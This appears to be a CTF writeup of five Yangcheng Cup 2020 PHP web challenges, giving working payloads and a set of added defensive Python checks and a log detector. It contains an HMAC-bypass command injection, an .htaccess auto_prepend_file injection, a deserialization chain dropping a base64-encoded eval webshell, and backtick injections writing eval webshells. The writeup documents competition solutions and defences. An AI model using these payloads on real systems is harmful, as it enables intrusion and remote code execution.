
Yangcheng Cup (羊城杯) 2020

Recording my writeups here.

easycon

After connecting with AntSword, there is a file bbbbbbbbb.txt; base64-decoding it and saving the result as an image reveals the flag.

```python
import base64

# bbbbbbbbb.txt holds the flag image as base64 text; decode it and write the
# raw bytes out (open the result as an image to see the flag).
with open('bbbbbbbbb.txt', 'r') as f:
    s = f.read()
with open('1.txt', 'wb') as f2:
    f2.write(base64.b64decode(s))
```

BlackCat

The source is at:

```text
view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3
```

The source is:

```php
<?php
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
    die('谁!竟敢踩我一只耳的尾巴!');
}

$clandestine = getenv("clandestine");

if(isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);

$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);

if($hh !== $_POST['Black-Cat-Sheriff']){
    die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}

echo exec("nc".$_POST['One-ear']);
```

The original challenge is from:

```text
https://neversecure.ca/category/bug-hunting/
```

Exploit

```text
http://183.129.189.60:10022/
# submitted as a POST body
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat+flag.php&White-cat-monitor=%5B%5D
```
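The check in that source is brittle in two ways worth spelling out from the defender's side: the HMAC key is re-derived from a client-supplied field, and in PHP 7 hash_hmac() returns NULL (with a warning) when its data argument is not a string, so the derived key silently becomes the empty string (PHP 8 throws a TypeError instead); the value that passes the check is then concatenated straight into exec(). The Python model below is an added example, not code from the challenge or this writeup: parse_php_form(), php_style_hmac(), verify_weak() and verify_hardened() are names of my own, and SERVER_SECRET is a constructed constant standing in for the clandestine environment variable.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed stand-in for getenv("clandestine"); the real value lives only on the server.
SERVER_SECRET = "constructed-demo-secret"


def parse_php_form(body):
    """Decode a form body the way PHP fills $_POST: a name ending in []
    becomes a list, any other name keeps the last string value sent."""
    form = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name.endswith("[]"):
            form[name[:-2]] = values
        else:
            form[name] = values[-1]
    return form


def hmac_hex(key, data):
    """HMAC-SHA256 as a lowercase hex string, the format hash_hmac() returns."""
    return hmac.new(key.encode(), data.encode(), hashlib.sha256).hexdigest()


def php_style_hmac(data, key):
    """Model of PHP 7 hash_hmac(): a non-string data argument yields NULL
    (plus a warning) instead of an error."""
    if not isinstance(data, str):
        return None
    return hmac_hex(key, data)


def verify_weak(form):
    """The challenge's logic: a client-supplied White-cat-monitor re-derives
    the key, and a NULL result is coerced to the empty string."""
    key = SERVER_SECRET
    if "White-cat-monitor" in form:
        key = php_style_hmac(form["White-cat-monitor"], key) or ""
    expected = php_style_hmac(form.get("One-ear"), key)
    return expected is not None and expected == form.get("Black-Cat-Sheriff")


def verify_hardened(form):
    """Fixed version: the key is never derived from request data, every
    field must be a string, and the comparison is constant-time."""
    one_ear = form.get("One-ear")
    tag = form.get("Black-Cat-Sheriff")
    if not isinstance(one_ear, str) or not isinstance(tag, str):
        return False
    return hmac.compare_digest(hmac_hex(SERVER_SECRET, one_ear), tag)
```

verify_hardened() deliberately stops at the signature: a value that carries a valid tag still has to be checked against an allowlist before it goes anywhere near exec(), because the tag only proves who produced the value, not that it is safe to pass to a shell.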

easyphp

The source is:

```php
<?php
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
    highlight_file(__FILE__);
    die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
    echo "Hacker";
    die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
    echo "Hacker";
    die();
}
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
file_put_contents($filename, $content . "\nHello, world");
?>
```

The original challenge can be found online: X-NUCA'2019 Ezphp.

Prerequisite knowledge:

php.ini has two directives that require a file at the top and bottom of every page:

  • auto_prepend_file loads a file at the top of the page

  • auto_append_file loads a file at the bottom of the page

For example, the following includes the .htaccess file itself into every PHP page:

```apache
php_value auto_prepend_file .htaccess
```

The stristr() blocklist can then be bypassed with a backslash: Apache treats a backslash at the end of a line as a line continuation, so a blocked word such as file can be split across two lines and still be read as one directive.

The "\nHello, world" that the script appends must also be neutralised with a trailing backslash, so that it becomes a continuation of the comment line rather than a directive of its own.

Payload

```text
?content=php_value auto_prepend_fil\%0Ae .htaccess%0A%23<?php system('cat /f'.'lag');?>\&filename=.htaccess
```
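The lesson for anyone writing such a filter is that a substring blocklist is checked against the raw bytes while Apache parses the same bytes after folding line continuations, so the two never see the same text, and that the filename regex still permits dotfiles. Below is an added example of my own (not the challenge's code) that reproduces the stristr() word list, folds backslash-newline continuations before checking, and allowlists the filename so that configuration files such as .htaccess or .user.ini cannot be written; normalize_directive_text(), naive_check() and hardened_check() are hypothetical names.

```python
import re

# The challenge's stristr() blocklist, reproduced for the comparison.
BLOCKED_WORDS = ("on", "html", "type", "upload", "file", "flag")


def normalize_directive_text(content):
    """Fold Apache-style line continuations: a backslash immediately before
    a newline joins the next line onto the current one, so a word split as
    fil<backslash><newline>e is read by the .htaccess parser as "file".
    Any keyword check has to run on this folded form."""
    return re.sub(r"\\\r?\n", "", content)


def naive_check(content):
    """The original filter: case-insensitive substring match on the raw text.
    Returns True when the content would be accepted."""
    lowered = content.lower()
    return not any(word in lowered for word in BLOCKED_WORDS)


def hardened_check(filename, content):
    """Allowlist the filename (letters plus a fixed .txt suffix, so no
    leading dot and no .htaccess / .user.ini) and run the keyword check on
    normalized text rather than on the raw bytes."""
    if not re.fullmatch(r"[a-z]+\.txt", filename):
        return False
    return naive_check(normalize_directive_text(content))
```

The important line is the order of operations in hardened_check(): normalize first, then inspect. A filter that inspects first and lets a later parser normalize is always one encoding trick behind.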

easyser

First visit robots.txt, which hints Disallow: /star1.php/; the page source contains:

```html
<!-- Little Fatty says you can only get into ser.php from my home with an insecure protocol! -->
```

The insecure protocol is plain http, so fetch ser.php through the loopback address:

```text
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php
```

This gives the source:

```php
<?php
error_reporting(0);
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this->file = $file;
        $this->text = $text;
    }
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this->file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?>
```

file_put_contents is clearly meant to write a shell, with a die() guard prepended to the content, so we build a chain. __toString has to be triggered somewhere, but nothing in the source does it; a blind guess is that the deserialization entry point is an echo unserialize(...) sink. The chain is built as follows:

```php
// Run together with the class definitions from ser.php above.
$GWHT = new GWHT();
$GWHT->hero = new Yongen();
// The write filter strips the die() tag, then base64-decodes the remainder.
$GWHT->hero->file = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php';
$GWHT->hero->text = 'PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==';
$a = serialize($GWHT);
echo $a;
```

Payload

```text
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/star1.php?path=http://127.0.0.1/sandbox/hrnh1cvpq4bvbm960878icaodb/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}
```

Connect with AntSword (shell URL and POST parameter below); the flag is at /ffflag in the root directory.

```text
http://183.129.189.60:10024/sandbox/hrnh1cvpq4bvbm960878icaodb/shell.php
cmd
```

Easyphp2

First, read the file through the php://filter pseudo-protocol:

```text
http://183.129.189.60:10025/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
http://183.129.189.60:10025/?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php
```

The source is:

```php
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>count is here</title>

    <style>
        html,
        body {
            overflow: none;
            max-height: 100vh;
        }
    </style>
</head>

<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">

<center><img src="question.jpg" height="200" width="200" /> </center>

<?php
ini_set('max_execution_time', 5);

if ($_COOKIE['pass'] !== getenv('PASS')) {
    setcookie('pass', 'PASS');
    die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>

<h1>A Counter is here, but it has someting wrong</h1>

<form>
    <input type="hidden" value="GWHT.php" name="file">
    <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
    <input type="submit">
</form>

<?php
if (isset($_GET["count"])) {
    $count = $_GET["count"];
    if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
        die('hacker!');
    }
    echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>

</body>
</html>
```

First, commands can be executed by nesting backticks inside the single quotes:

```text
http://183.129.189.60:10025/?file=GWHT.php&count='`ls > 1.txt`'
```

Prerequisite knowledge:

Because $_POST and $_GET are filtered, get_defined_vars() can be used instead.

Printing get_defined_vars() gives:

```text
array(4) { ["_GET"]=> array(0) { } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["pass"]=> string(4) "PASS" } ["_FILES"]=> array(0) { } }
```

The outermost value is an array whose first element is _GET, so wrapping the call in two layers of pos() returns the first value of _GET; the following is therefore equivalent to a one-line webshell:

```php
eval(pos(pos(get_defined_vars())));
```

Payload

```text
http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(pos(get_defined_vars())))?>">1.php`'
```

Then write a POST-based webshell through it:

```text
http://183.129.189.60:10021/1.php?a=file_put_contents('kkk.php', base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
```

Alternatively, using next() gives a shell that AntSword can connect to directly:

```text
http://183.129.189.60:10021/?file=GWHT.php&count='`echo "<?=eval(pos(next(get_defined_vars())))?>">1.php`'
```
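For easyser and Easyphp2 together, here is an added detection example of my own (not code from either challenge or from this writeup) that reads request lines and flags the patterns both solutions depend on: a loopback URL handed to a fetch parameter, a serialized PHP object in a query parameter, a php:// stream wrapper or filter name that only appears after a second round of percent-decoding, and backtick or $( ) command substitution. SAMPLE_LOG is constructed with placeholder paths; inspect_request(), scan_log(), full_decode() and the rule names are mine.

```python
import re
from urllib.parse import unquote

# Constructed request lines (placeholder paths, not real traffic), one per
# technique on this page: loopback SSRF + serialized object, double-encoded
# php://filter chain, backtick substitution, and a benign request.
SAMPLE_LOG = """\
GET /star1.php?path=http://127.0.0.1/ser.php&c=O:4:"GWHT":1:{s:4:"hero";O:5:"Yasuo":0:{}}
GET /?file=php://filter/read=convert.%2562%2561%2573%2565%2536%2534-encode/resource=GWHT.php
GET /?file=GWHT.php&count='`ls%20>%201.txt`'
GET /?file=GWHT.php&count=hello
"""

RULES = (
    ("php_stream_wrapper", re.compile(r"php://", re.I)),
    ("serialized_php_object", re.compile(r'O:\d+:"')),
    ("shell_substitution", re.compile(r"`|\$\(")),
    ("loopback_url", re.compile(r"^https?://(127\.0\.0\.1|localhost|0\.0\.0\.0)", re.I)),
)


def full_decode(value, rounds=3):
    """Percent-decode until the text stops changing (bounded), so that
    %2562 -> %62 -> b is seen as the 'b' the PHP stream layer will see."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line):
    """Return (parameter, finding) pairs for one 'METHOD target' log line."""
    _method, _, target = line.strip().partition(" ")
    query = target.partition("?")[2]
    findings = []
    for part in query.split("&"):  # split by hand: parse_qsl may also split on ';'
        if not part:
            continue
        name, _, raw = part.partition("=")
        once = unquote(raw)
        decoded = full_decode(once)
        if decoded != once:
            findings.append((name, "double_url_encoding"))
        for label, pattern in RULES:
            if pattern.search(decoded):
                findings.append((name, label))
    return findings


def scan_log(text):
    """Map 1-based line number -> findings for every non-empty line."""
    return {n: inspect_request(l) for n, l in enumerate(text.splitlines(), 1) if l.strip()}


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print(n, hits or "clean")
```

The double_url_encoding finding is the one that matters most for the Easyphp2 read: a single-decode filter never sees the word base64, while PHP's stream layer does. Bounding full_decode() at a few rounds keeps the detector from spending unbounded time on a value built to be decoded forever.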